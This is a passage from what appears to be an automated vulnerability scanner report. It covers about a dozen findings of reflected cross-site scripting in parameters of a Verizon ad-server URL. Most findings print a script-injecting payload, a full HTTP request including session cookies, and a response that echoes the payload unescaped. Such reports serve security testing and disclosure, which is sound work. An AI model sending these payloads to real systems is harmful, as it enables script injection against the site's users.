4/644757688/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=63b79"><script>alert(1)</script>b916806bab4&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb
...[SNIP]...

2.553. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popstate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f410"><script>alert(1)</script>ee95a8779a1 was submitted in the popstate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=4f410"><script>alert(1)</script>ee95a8779a1&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ds/click_lx.ads/vzsurround2.net/homepage/L24/315490972/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=4f410"><script>alert(1)</script>ee95a8779a1&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&onli
...[SNIP]...

2.554. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popzipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94271"><script>alert(1)</script>8053cc9fc4c was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=94271"><script>alert(1)</script>8053cc9fc4c&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ds/vzsurround2.net/homepage/L24/1875630047/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=94271"><script>alert(1)</script>8053cc9fc4c&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&s
...[SNIP]...

2.555. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [prizm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2446d"><script>alert(1)</script>af1d97ada25 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=2446d"><script>alert(1)</script>af1d97ada25&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=2446d"><script>alert(1)</script>af1d97ada25&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex
...[SNIP]...

2.556. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [pts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbbc"><script>alert(1)</script>a37a99f6ea7 was submitted in the pts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=9fbbc"><script>alert(1)</script>a37a99f6ea7&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
tate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=9fbbc"><script>alert(1)</script>a37a99f6ea7&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.557. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [pws parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18d96"><script>alert(1)</script>b2201d9d2eb was submitted in the pws parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=18d96"><script>alert(1)</script>b2201d9d2eb&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
8326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=18d96"><script>alert(1)</script>b2201d9d2eb&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.558. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ace3"><script>alert(1)</script>b0f2d6e3cae was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=4ace3"><script>alert(1)</script>b0f2d6e3cae HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:24:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=4ace3"><script>alert(1)</script>b0f2d6e3cae" target="_top">
...[SNIP]...

2.559. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [sec_email parameter]  previous  next

Summary


Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail


The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4adc1"><script>alert(1)</script>ef2ea373ef was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=4adc1"><script>alert(1)</script>ef2ea373ef&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
y=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=4adc1"><script>alert(1)</script>ef2ea373ef&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.560. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [smb_enh_msg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e570"><script>alert(1)</script>32a26b6e1ec was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=1e570"><script>alert(1)</script>32a26b6e1ec&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:24:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=1e570"><script>alert(1)</script>32a26b6e1ec&webex=&search=" target="_top">
...[SNIP]...

2.561. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [smb_premmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac37"><script>alert(1)</script>d77c63e8ae was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=aac37"><script>alert(1)</script>d77c63e8ae&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1358
Content-Type: text/html
Cache-Control: private
Content-Length: 1358

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=aac37"><script>alert(1)</script>d77c63e8ae&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.562. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [usertype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f492c"><script>alert(1)</script>781bd544540 was submitted in the usertype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumerf492c"><script>alert(1)</script>781bd544540&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
sur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumerf492c"><script>alert(1)</script>781bd544540&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target=
...[SNIP]...

2.563. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [vasonly parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

